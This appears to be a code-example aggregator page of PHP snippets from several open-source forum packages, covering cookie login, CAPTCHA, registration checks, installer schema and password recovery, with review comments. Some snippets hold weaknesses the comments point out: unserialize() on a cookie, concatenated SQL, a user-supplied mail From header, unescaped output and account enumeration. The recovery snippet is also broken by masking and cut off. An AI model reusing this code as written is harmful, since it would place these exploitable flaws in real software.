Esempio n. 1
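/**
 * Authenticate the visitor from the login cookie and fill $pun_user.
 *
 * The cookie carries a serialized two-element array (user id, token). The token must
 * equal md5($cookie_seed . stored password hash); on any mismatch the cookie is reset
 * and the guest user is loaded through set_default_user().
 *
 * @param array $pun_user Receives the joined users/groups/online row (by reference).
 * @return void
 */
function check_cookie(&$pun_user)
{
    global $db, $pun_config, $cookie_name, $cookie_seed;
    $now = time();
    // The cookie expires after a year
    $expire = $now + 31536000;
    // We assume it's a guest
    $cookie = array('user_id' => 1, 'password_hash' => 'Guest');
    // If a cookie is set, we get the user_id and password hash from it
    if (isset($_COOKIE[$cookie_name])) {
        // NOTE(security): unserialize() runs on a client-controlled value, which allows PHP
        // object injection when a loaded class has exploitable magic methods. It is kept so
        // existing cookies stay valid; the durable fix is a non-executable cookie format, or
        // unserialize($value, array('allowed_classes' => false)) once PHP >= 7.0 is guaranteed.
        $data = @unserialize($_COOKIE[$cookie_name]);
        // Accept only the exact expected shape: array(scalar id, string token).
        // Anything else leaves the guest defaults in place.
        if (is_array($data) && isset($data[0], $data[1]) && is_scalar($data[0]) && is_string($data[1])) {
            $cookie['user_id'] = $data[0];
            $cookie['password_hash'] = $data[1];
        }
    }
    if ($cookie['user_id'] > 1) {
        // Check if there's a user with the user ID and password hash from the cookie
        $result = $db->query('SELECT u.*, g.*, o.logged, o.idle FROM ' . $db->prefix . 'users AS u INNER JOIN ' . $db->prefix . 'groups AS g ON u.group_id=g.g_id LEFT JOIN ' . $db->prefix . 'online AS o ON o.user_id=u.id WHERE u.id=' . intval($cookie['user_id'])) or error('Unable to fetch user information', __FILE__, __LINE__, $db->error());
        $pun_user = $db->fetch_assoc($result);
        // NOTE(security): the token depends only on $cookie_seed and the stored password hash,
        // so a captured cookie stays valid until the password changes, and MD5 is a weak
        // primitive for an authentication token.
        $authorised = isset($pun_user['id']);
        if ($authorised) {
            $expected = md5($cookie_seed . $pun_user['password']);
            // Compare in constant time where the runtime offers it (PHP >= 5.6)
            $authorised = function_exists('hash_equals')
                ? hash_equals($expected, $cookie['password_hash'])
                : $expected === $cookie['password_hash'];
        }
        // If user authorisation failed
        if (!$authorised) {
            pun_setcookie(0, random_pass(8), $expire);
            set_default_user();
            return;
        }
        // Set a default language if the user selected language no longer exists
        if (!@file_exists(PUN_ROOT . 'lang/' . $pun_user['language'])) {
            $pun_user['language'] = $pun_config['o_default_lang'];
        }
        // Set a default style if the user selected style no longer exists
        if (!(@file_exists(PUN_ROOT . 'style/' . $pun_user['style'] . '.css') || defined('PUN_STYLE_DIR') && defined('PUN_STYLE_PATH') && @file_exists(PUN_STYLE_DIR . $pun_user['style'] . '.css'))) {
            // NOTE(review): raises E_USER_NOTICE on every reset; looks like leftover debug output - confirm
            trigger_error('resetting');
            $pun_user['style'] = $pun_config['o_default_style'];
        }
        if (!$pun_user['disp_topics']) {
            $pun_user['disp_topics'] = $pun_config['o_disp_topics_default'];
        }
        if (!$pun_user['disp_posts']) {
            $pun_user['disp_posts'] = $pun_config['o_disp_posts_default'];
        }
        // A value of 0 is stored in $expire when the user chose not to save the password
        if ($pun_user['save_pass'] == '0') {
            $expire = 0;
        }
        // Define this if you want this visit to affect the online list and the users last visit data
        if (!defined('PUN_QUIET_VISIT')) {
            // Update the online list
            // The values concatenated into the statements below come from the row just read
            // from the database or from time(), not from the request.
            if (!$pun_user['logged']) {
                $db->query('INSERT INTO ' . $db->prefix . 'online (user_id, ident, logged) VALUES(' . $pun_user['id'] . ', \'' . $db->escape($pun_user['username']) . '\', ' . $now . ')') or error('Unable to insert into online list', __FILE__, __LINE__, $db->error());
            } else {
                // Special case: We've timed out, but no other user has browsed the forums since we timed out
                if ($pun_user['logged'] < $now - $pun_config['o_timeout_visit']) {
                    $db->query('UPDATE ' . $db->prefix . 'users SET last_visit=' . $pun_user['logged'] . ' WHERE id=' . $pun_user['id']) or error('Unable to update user visit data', __FILE__, __LINE__, $db->error());
                    $pun_user['last_visit'] = $pun_user['logged'];
                }
                $idle_sql = $pun_user['idle'] == '1' ? ', idle=0' : '';
                $db->query('UPDATE ' . $db->prefix . 'online SET logged=' . $now . $idle_sql . ' WHERE user_id=' . $pun_user['id']) or error('Unable to update online list', __FILE__, __LINE__, $db->error());
            }
        }
        $pun_user['is_guest'] = false;
    } else {
        set_default_user();
    }
}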
 /**
  * Build the registration CAPTCHA: pick a random word, set the verification cookie,
  * and prepare the markup (word letters mixed with CSS-hidden decoy letters).
  *
  * NOTE(security): the check is stateless. The cookie holds
  * sha1(lowercased word . $cookie_seed . 'secret' . timestamp) plus the timestamp, so its
  * strength rests on $cookie_seed staying secret (the word is only 4-6 characters), and
  * nothing visible here prevents reuse of a solved cookie during its 120-second lifetime.
  * The decoy positions are published in the generated CSS rules, so the obfuscation only
  * affects what a human sees. mt_rand() is not a cryptographic generator.
  */
 function hook_register_before_header()
 {
     global $required_fields, $errors, $cookie_name, $cookie_seed;

     $this->load_lang();
     $required_fields['req_word'] = $this->lang['Captcha'];

     // Word the visitor has to type, bound to the issue time in the cookie
     $issued_at = time();
     $answer = random_pass(mt_rand(4, 6));
     $token = sha1(strtolower($answer) . $cookie_seed . 'secret' . $issued_at);
     forum_setcookie($cookie_name . '_captcha', $token . '-' . $issued_at, $issued_at + 120);

     // Insert 1-3 decoy characters at increasing positions and hide each with a CSS rule
     $glyphs = str_split($answer);
     $decoys = str_split(random_pass(mt_rand(1, 3)));
     $pos = -1;
     $css = '';
     foreach ($decoys as $decoy) {
         $pos = mt_rand($pos + 1, count($glyphs));
         array_splice($glyphs, $pos, 0, $decoy);
         // nth-child is 1-based, the array position is 0-based
         $css .= '.masq i:nth-child(' . ($pos + 1) . '){display:none;} ';
     }

     $this->styles = $css;
     $this->spans = '<i>' . implode('</i><i>', $glyphs) . '</i>';
 }
Esempio n. 3
    $page_title = array($panther_config['o_board_title'], $lang_admin_common['Admin'], $lang_admin_common['Prune']);
    define('PANTHER_ACTIVE_PAGE', 'admin');
    require PANTHER_ROOT . 'header.php';
    generate_admin_menu('maintenance');
    $tpl = load_template('confirm_prune.tpl');
    echo $tpl->render(array('lang_admin_maintenance' => $lang_admin_maintenance, 'lang_admin_common' => $lang_admin_common, 'link' => panther_link($panther_url['admin_maintenance']), 'csrf_token' => generate_csrf_token(PANTHER_ADMIN_DIR . '/maintenance.php'), 'prune_days' => $prune_days, 'prune_sticky' => $prune_sticky, 'prune_from' => $prune_from, 'forum' => $forum, 'num_topics' => forum_number_format($num_topics)));
    require PANTHER_ROOT . 'footer.php';
}
if ($action == 'add_user') {
    $errors = array();
    $username = isset($_POST['username']) ? panther_trim($_POST['username']) : '';
    $random_pass = isset($_POST['random_pass']) && $_POST['random_pass'] == '1' ? 1 : 0;
    $email = isset($_POST['email']) ? strtolower(panther_trim($_POST['email'])) : '';
    $password_salt = random_pass(16);
    if ($random_pass == '1') {
        $password1 = random_pass(12);
        $password2 = $password1;
    } else {
        $password1 = isset($_POST['password1']) ? panther_trim($_POST['password1']) : '';
        $password2 = isset($_POST['password2']) ? panther_trim($_POST['password2']) : '';
    }
    require PANTHER_ROOT . 'lang/' . $panther_user['language'] . '/prof_reg.php';
    // Validate username and passwords
    check_username($username);
    if (panther_strlen($password1) < 6) {
        $errors[] = $lang_prof_reg['Pass too short'];
    } else {
        if ($password1 != $password2) {
            $errors[] = $lang_prof_reg['Pass not match'];
        }
    }
Esempio n. 4
             if ($pun_config['p_allow_dupe_email'] == '0') {
                 message($lang_prof_reg['Dupe email']);
             } else {
                 if ($pun_config['o_mailing_list'] != '') {
                     while ($cur_dupe = $db->fetch_assoc($result)) {
                         $dupe_list[] = $cur_dupe['username'];
                     }
                     $mail_subject = $lang_common['Duplicate email notification'];
                     $mail_message = sprintf($lang_common['Duplicate email change message'], $pun_user['username'], implode(', ', $dupe_list)) . "\n";
                     $mail_message .= sprintf($lang_common['User profile'], get_base_url() . '/profile.php?id=' . $id) . "\n";
                     $mail_message .= "\n" . '--' . "\n" . $lang_common['Email signature'];
                     pun_mail($pun_config['o_mailing_list'], $mail_subject, $mail_message);
                 }
             }
         }
         $new_email_key = random_pass(8);
         $db->query('UPDATE ' . $db->prefix . 'users SET activate_string=\'' . $db->escape($new_email) . '\', activate_key=\'' . $new_email_key . '\' WHERE id=' . $id) or error('Unable to update activation data', __FILE__, __LINE__, $db->error());
         // Load the "activate email" template
         $mail_tpl = trim(file_get_contents(PUN_ROOT . 'lang/' . $pun_user['language'] . '/mail_templates/activate_email.tpl'));
         // The first row contains the subject
         $first_crlf = strpos($mail_tpl, "\n");
         $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
         $mail_message = trim(substr($mail_tpl, $first_crlf));
         $mail_message = str_replace('<username>', $pun_user['username'], $mail_message);
         $mail_message = str_replace('<base_url>', get_base_url(), $mail_message);
         $mail_message = str_replace('<activation_url>', get_base_url() . '/profile.php?action=change_email&id=' . $id . '&key=' . $new_email_key, $mail_message);
         $mail_message = str_replace('<board_mailer>', $pun_config['o_board_title'] . ' ' . $lang_common['Mailer'], $mail_message);
         pun_mail($new_email, $mail_subject, $mail_message);
         message($lang_profile['Activate email sent'] . ' <a href="mailto:' . $pun_config['o_admin_email'] . '">' . $pun_config['o_admin_email'] . '</a>.', true);
     }
 }
Esempio n. 5
 * Based on code by Rickard Andersson copyright (C) 2002-2008 PunBB
 * Licensed under GPLv2 (http://getluna.org/license.php)
 */
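define('LUNA_ROOT', '../');
require LUNA_ROOT . 'include/common.php';
// Only administrators may use this page. header() merely queues the redirect; without an
// explicit exit the rest of the script (including the POST handlers below) would still
// run for a non-admin request.
if (!$is_admin) {
    header("Location: login.php");
    exit;
}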
// Create new user
if (isset($_POST['add_user'])) {
    $username = luna_trim($_POST['username']);
    $email1 = strtolower(trim($_POST['email']));
    $email2 = strtolower(trim($_POST['email']));
    $trimpassword = trim($_POST['password']);
    if (isset($_POST['random_pass'])) {
        $password = random_pass(8);
    } elseif (!empty($trimpassword)) {
        $password = trim($_POST['password']);
    } else {
        redirect('backstage/users.php?user_failed=true');
    }
    $errors = array();
    // Convert multiple whitespace characters into one (to prevent people from registering with indistinguishable usernames)
    $username = preg_replace('#\\s+#s', ' ', $username);
    // Validate username and passwords
    if (strlen($username) < 2) {
        message_backstage(__('Usernames must be at least 2 characters long. Please choose another (longer) username.', 'luna'));
    } elseif (luna_strlen($username) > 25) {
        // This usually doesn't happen since the form element only accepts 25 characters
        message_backstage(__('Passwords must be at least 6 characters long. Please choose another (longer) password.', 'luna'));
    } elseif (!strcasecmp($username, 'Guest') || !strcasecmp($username, __('Guest', 'luna'))) {
Esempio n. 6
     if ($_SESSION['captcha_keystring'] != strtolower(trim($_POST['req_image_']))) {
         unset($_SESSION['captcha_keystring']);
         message($lang_register['Text mismatch']);
     }
     if (!isset($_SESSION['captcha_keystring'])) {
         unset($_SESSION['captcha_keystring']);
         message($lang_common['Bad request']);
     }
     unset($_SESSION['captcha_keystring']);
 }
 // IMAGE VERIFICATION MOD END
 $username = pun_trim($_POST['req_username']);
 $email1 = strtolower(trim($_POST['req_email1']));
 if ($pun_config['o_regs_verify'] == 1) {
     $email2 = strtolower(trim($_POST['req_email2']));
     $password1 = random_pass(mt_rand(8, 9));
     $password2 = $password1;
 } else {
     $password1 = trim($_POST['req_password1']);
     $password2 = trim($_POST['req_password2']);
 }
 // Convert multiple whitespace characters into one (to prevent people from registering with indistinguishable usernames)
 $username = preg_replace('#\\s+#s', ' ', $username);
 // Validate username and passwords
 if (mb_strlen($username) < 2) {
     message($lang_prof_reg['Username too short']);
 } else {
     if (mb_strlen($username) > 25) {
         // This usually doesn't happen since the form element only accepts 25 characters
         message($lang_common['Bad request']);
     } else {
Esempio n. 7
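 /**
  * Validate a registration request and collect the submitted user data.
  *
  * Reads the posted username, e-mail, password, antispam answer and language, and records
  * every validation failure in $user['errors']. A registration flood from the same IP or an
  * unknown language ends the request through message().
  *
  * @return array The collected fields: 'username', 'email1', 'password1', 'language',
  *               'errors', and 'banned_email' when the address is on the ban list.
  */
 public function check_for_errors()
 {
     global $lang_register, $lang_prof_reg, $lang_common, $lang_antispam, $lang_antispam_questions;
     $user = array();
     // NOTE(review): starts as a string but is appended to with [] below; this relies on
     // check_username() returning an array - confirm, since [] on a string is fatal on PHP >= 7.1
     $user['errors'] = '';
     // Check that someone from this IP didn't register a user within the last hour (DoS prevention)
     // NOTE(review): only as reliable as get_remote_address(); confirm it does not trust
     // client-supplied forwarding headers
     $already_registered = DB::for_table('users')->where('registration_ip', get_remote_address())->where_gt('registered', time() - 3600)->find_one();
     if ($already_registered) {
         message($lang_register['Registration flood']);
     }
     $user['username'] = feather_trim($this->request->post('req_user'));
     $user['email1'] = strtolower(feather_trim($this->request->post('req_email1')));
     if ($this->config['o_regs_verify'] == '1') {
         // With e-mail verification the password is generated, not chosen
         $email2 = strtolower(feather_trim($this->request->post('req_email2')));
         $user['password1'] = random_pass(12);
         $password2 = $user['password1'];
     } else {
         $user['password1'] = feather_trim($this->request->post('req_password1'));
         $password2 = feather_trim($this->request->post('req_password2'));
     }
     // Validate username and passwords
     $user['errors'] = check_username($user['username'], $user['errors']);
     if (feather_strlen($user['password1']) < 6) {
         $user['errors'][] = $lang_prof_reg['Pass too short'];
     } elseif ($user['password1'] !== $password2) {
         // Strict comparison: with != two different numeric-looking strings
         // (e.g. '0e12345' and '0e67890') compare as equal numbers
         $user['errors'][] = $lang_prof_reg['Pass not match'];
     }
     // Antispam feature
     // NOTE(security): the question id comes from the request, so the client chooses which
     // question it answers; the check does not bind the question to what the form displayed.
     $question = $this->request->post('captcha_q') ? trim($this->request->post('captcha_q')) : '';
     $answer = $this->request->post('captcha') ? strtoupper(trim($this->request->post('captcha'))) : '';
     $lang_antispam_questions_array = array();
     foreach ($lang_antispam_questions as $k => $v) {
         // Questions are keyed by the md5 of their text; answers are compared in upper case
         $lang_antispam_questions_array[md5($k)] = strtoupper($v);
     }
     if (empty($lang_antispam_questions_array[$question]) || $lang_antispam_questions_array[$question] !== $answer) {
         $user['errors'][] = $lang_antispam['Robot test fail'];
     }
     // Validate email
     require FEATHER_ROOT . 'include/email.php';
     if (!is_valid_email($user['email1'])) {
         $user['errors'][] = $lang_common['Invalid email'];
     } elseif ($this->config['o_regs_verify'] == '1' && $user['email1'] !== $email2) {
         $user['errors'][] = $lang_register['Email not match'];
     }
     // Check if it's a banned email address
     if (is_banned_email($user['email1'])) {
         if ($this->config['p_allow_banned_email'] == '0') {
             $user['errors'][] = $lang_prof_reg['Banned email'];
         }
         $user['banned_email'] = 1;
         // Used later when we send an alert email
     }
     // Check if someone else already has registered with that email address
     // NOTE(review): $dupe_list is filled but not returned by the visible code
     $dupe_list = array();
     $dupe_mail = DB::for_table('users')->select('username')->where('email', $user['email1'])->find_many();
     if ($dupe_mail) {
         if ($this->config['p_allow_dupe_email'] == '0') {
             $user['errors'][] = $lang_prof_reg['Dupe email'];
         }
         foreach ($dupe_mail as $cur_dupe) {
             $dupe_list[] = $cur_dupe['username'];
         }
     }
     // Make sure we got a valid language string
     if ($this->request->post('language')) {
         // Dots and both slash types are stripped before the value is used in a path,
         // and the resulting directory must exist
         $user['language'] = preg_replace('%[\\.\\\\/]%', '', $this->request->post('language'));
         if (!file_exists(FEATHER_ROOT . 'lang/' . $user['language'] . '/common.php')) {
             message($lang_common['Bad request'], '404');
         }
     } else {
         $user['language'] = $this->config['o_default_lang'];
     }
     return $user;
 }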
Esempio n. 8
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'title' => array('datatype' => 'varchar(50)', 'allow_null' => false, 'default' => '\'New Action\''), 'close' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'2\''), 'stick' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'2\''), 'move' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'archive' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'leave_redirect' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'reply_message' => array('datatype' => 'mediumtext', 'allow_null' => true), 'add_start' => array('datatype' => 'VARCHAR(50)', 'allow_null' => true, 'default' => null), 'add_end' => array('datatype' => 'VARCHAR(50)', 'allow_null' => true, 'default' => null), 'send_email' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0'), 'increment_posts' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('multi_moderation', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'rank' => array('datatype' => 'VARCHAR(50)', 'allow_null' => false, 'default' => '\'\''), 'min_posts' => array('datatype' => 'MEDIUMINT(8) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('ranks', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'image' => array('datatype' => 'VARCHAR(40)', 'allow_null' => false, 'default' => '\'\''), 'code' => array('datatype' => 'VARCHAR(20)', 'allow_null' => false, 'default' => '\'\''), 'disp_position' => array('datatype' => 'TINYINT(2) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('smilies', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'title' => array('datatype' => 'VARCHAR(50)', 'allow_null' => false, 'default' => '\'New Task\''), 'next_run' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'script' => array('datatype' => 'VARCHAR(30)', 'allow_null' => false), 'minute' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'hour' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'day' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'month' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'week_day' => array('datatype' => 'VARCHAR(1)', 'allow_null' => false, 'default' => '\'*\''), 'locked' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('tasks', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'SERIAL', 'allow_null' => false), 'user_id' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'type_id' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'post_id' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'title' => array('datatype' => 'VARCHAR(120)', 'allow_null' => false, 'default' => '\'\''), 'points' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'date_issued' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'date_expire' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'issued_by' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'expired' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0'), 'note_admin' => array('datatype' => 'TEXT', 'allow_null' => true), 'note_post' => array('datatype' => 'MEDIUMTEXT', 'allow_null' => true), 'note_pm' => array('datatype' => 'TEXT', 'allow_null' => true)), 'PRIMARY KEY' => array('id'));
 $db->create_table('warnings', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'SERIAL', 'allow_null' => false), 'title' => array('datatype' => 'VARCHAR(120)', 'allow_null' => false, 'default' => '\'\''), 'description' => array('datatype' => 'TEXT', 'allow_null' => true), 'points' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'expiration_time' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('warning_types', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'SERIAL', 'allow_null' => false), 'points' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'message' => array('datatype' => 'VARCHAR(255)', 'allow_null' => false, 'default' => '\'\''), 'period' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('warning_levels', $schema);
 $now = time();
 $password_salt = random_pass(16);
 $insert = array('g_id' => 1, 'g_title' => $lang_install['Administrators'], 'g_user_title' => $lang_install['Administrator'], 'g_moderator' => 0, 'g_mod_cp' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_post_polls' => 1, 'g_view_users' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 1, 'g_delete_posts' => 1, 'g_delete_topics' => 1, 'g_set_title' => 1, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 0, 'g_use_pm' => 1, 'g_pm_limit' => 0, 'g_search_flood' => 0, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 1, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '#AA0000');
 // Insert the five preset groups
 $db->insert('groups', $insert);
 $insert = array('g_id' => 2, 'g_title' => $lang_install['Global Moderators'], 'g_user_title' => $lang_install['Global Moderator'], 'g_moderator' => 1, 'g_mod_cp' => 1, 'g_global_moderator' => 1, 'g_mod_edit_users' => 1, 'g_mod_sfs_report' => 1, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 1, 'g_mod_ban_users' => 1, 'g_post_polls' => 1, 'g_mod_warn_users' => 1, 'g_mod_edit_admin_posts' => 1, 'g_read_board' => 1, 'g_view_users' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 1, 'g_delete_posts' => 1, 'g_delete_topics' => 1, 'g_set_title' => 1, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 0, 'g_use_pm' => 1, 'g_pm_limit' => 0, 'g_search_flood' => 0, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 1, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '#0000CC', 'g_attach_files' => 1, 'g_max_attachments' => 5, 'g_max_size' => 10485760);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 3, 'g_title' => $lang_install['Moderators'], 'g_user_title' => $lang_install['Moderator'], 'g_moderator' => 1, 'g_mod_cp' => 1, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_sfs_report' => 1, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 1, 'g_mod_warn_users' => 1, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_post_polls' => 1, 'g_view_users' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 1, 'g_delete_posts' => 1, 'g_delete_topics' => 1, 'g_set_title' => 1, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 0, 'g_use_pm' => 1, 'g_pm_limit' => 0, 'g_search_flood' => 0, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 1, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '#00AA00', 'g_attach_files' => 1, 'g_max_attachments' => 5, 'g_max_size' => 10485760, 'g_pm_folder_limit' => 10);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 4, 'g_title' => $lang_install['Guests'], 'g_moderator' => 0, 'g_mod_cp' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_warn_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_view_users' => 0, 'g_post_replies' => 0, 'g_post_topics' => 0, 'g_edit_posts' => 0, 'g_edit_subject' => 0, 'g_delete_posts' => 0, 'g_delete_topics' => 0, 'g_set_title' => 0, 'g_search' => 1, 'g_search_users' => 0, 'g_send_email' => 0, 'g_post_flood' => 60, 'g_use_pm' => 0, 'g_pm_limit' => 0, 'g_search_flood' => 30, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 0, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '', 'g_attach_files' => 0);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 5, 'g_title' => $lang_install['Members'], 'g_moderator' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_warn_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_view_users' => 1, 'g_post_polls' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 0, 'g_delete_posts' => 0, 'g_delete_topics' => 0, 'g_set_title' => 0, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 5, 'g_use_pm' => 1, 'g_pm_limit' => 100, 'g_search_flood' => 30, 'g_email_flood' => 30, 'g_report_flood' => 30, 'g_rep_enabled' => 1, 'g_rep_interval' => 5, 'g_rep_plus' => 10, 'g_rep_minus' => 5, 'g_colour' => '', 'g_attach_files' => 1, 'g_max_attachments' => 2, 'g_max_size' => 5242880, 'g_pm_folder_limit' => 5);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 6, 'g_title' => $lang_install['New members'], 'g_moderator' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_promote_min_posts' => 5, 'g_promote_next_group' => 5, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_warn_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_post_polls' => 1, 'g_view_users' => 0, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 0, 'g_deledit_interval' => 600, 'g_delete_posts' => 0, 'g_delete_topics' => 0, 'g_set_title' => 0, 'g_search' => 1, 'g_search_users' => 0, 'g_send_email' => 1, 'g_post_flood' => 60, 'g_use_pm' => 0, 'g_pm_limit' => 0, 'g_search_flood' => 30, 'g_email_flood' => 60, 'g_report_flood' => 60, 'g_rep_enabled' => 1, 'g_rep_interval' => 5, 'g_rep_plus' => 5, 'g_rep_minus' => 5, 'g_colour' => '', 'g_attach_files' => 0, 'g_max_attachments' => 0, 'g_max_size' => 1, 'g_pm_folder_limit' => 1);
 $db->insert('groups', $insert);
 $insert = array('group_id' => 4, 'username' => $lang_install['Guest'], 'password' => $lang_install['Guest'], 'email' => $lang_install['Guest']);
 // Insert guest and first admin user
Esempio n. 9
// Password-recovery page: a visitor who is not logged in submits an e-mail address and,
// if it belongs to a user, a new password is generated and mailed.
// NOTE(review): the "******" runs below look like masking applied to this listing; the
// original expressions at those places are not visible here.
show_header();
show_menu();
list($username, $password) = get_data();
// Logged-in users are refused
if (login($username, $password)) {
    _err("Sei loggato al forum, pertanto, NON puoi inviare una richiesta di recupero password!");
}
$error_msg = array();
// initialise the array of errors
if (@$_GET['sendpassword'] == 1 && check_maintenance(2) != 1) {
    // NOTE(review): every later use of $email (SQL, mail header, HTML) relies on what
    // clear() and check_email() reject - confirm they cover quotes, CR/LF and markup
    $email = clear($_POST['email']);
    if (empty($email)) {
        $error_msg[] = "<font color=\"red\"><p><i>Inserire E-Mail per il recupero Password</i><p></font>";
    } elseif (check_email($email) == FALSE) {
        $error_msg[] = "<font color=\"red\"><p><i>Email inserita non valida!</i><p></font>";
    } elseif (check_user($email)) {
        $new_password = random_pass();
        // NOTE(security): the statement is built by string concatenation with $email; a
        // parameterised query would remove the dependency on clear(). The password column is
        // overwritten as soon as the form is submitted, with no confirmation step, so anyone
        // who knows an address can force a reset. The mysql_* extension was removed in PHP 7.
        mysql_query("UPDATE " . __PREFIX__ . "users SET password = '******' WHERE email = '" . $email . "'") or _err(mysql_error());
        $config = mysql_fetch_array(mysql_query("SELECT site_name, description FROM " . __PREFIX__ . "settings"));
        $oggetto = "Recupera password: "******".";
        // The new password is sent in clear text in the message body
        $messaggio = "Hai utilizzato il modulo per la reimpostazione della password su " . $config['site_name'] . "\n" . "Ecco quindi la tua nuova password:\n\n" . "Password: "******"\n\n" . "Lo Staff ~ " . $config['site_name'] . ".";
        // NOTE(security): the requester-supplied address is placed in the From header; if it can
        // contain CR/LF this allows mail header injection. @ hides a failed send.
        @mail($email, $oggetto, $messaggio, "From: " . $email);
        // NOTE(security): $email is echoed into HTML without htmlspecialchars()
        print "<p align=\"center\">Email Inviata con la nuova password a: " . $email . " :D</p>";
        // NOTE(review): header() is called after output has started; it only takes effect if
        // output buffering is active
        header("refresh:5; url=login.php");
        exit;
    } else {
        // NOTE(security): a distinct message for unknown addresses lets a visitor test which
        // e-mail addresses are registered
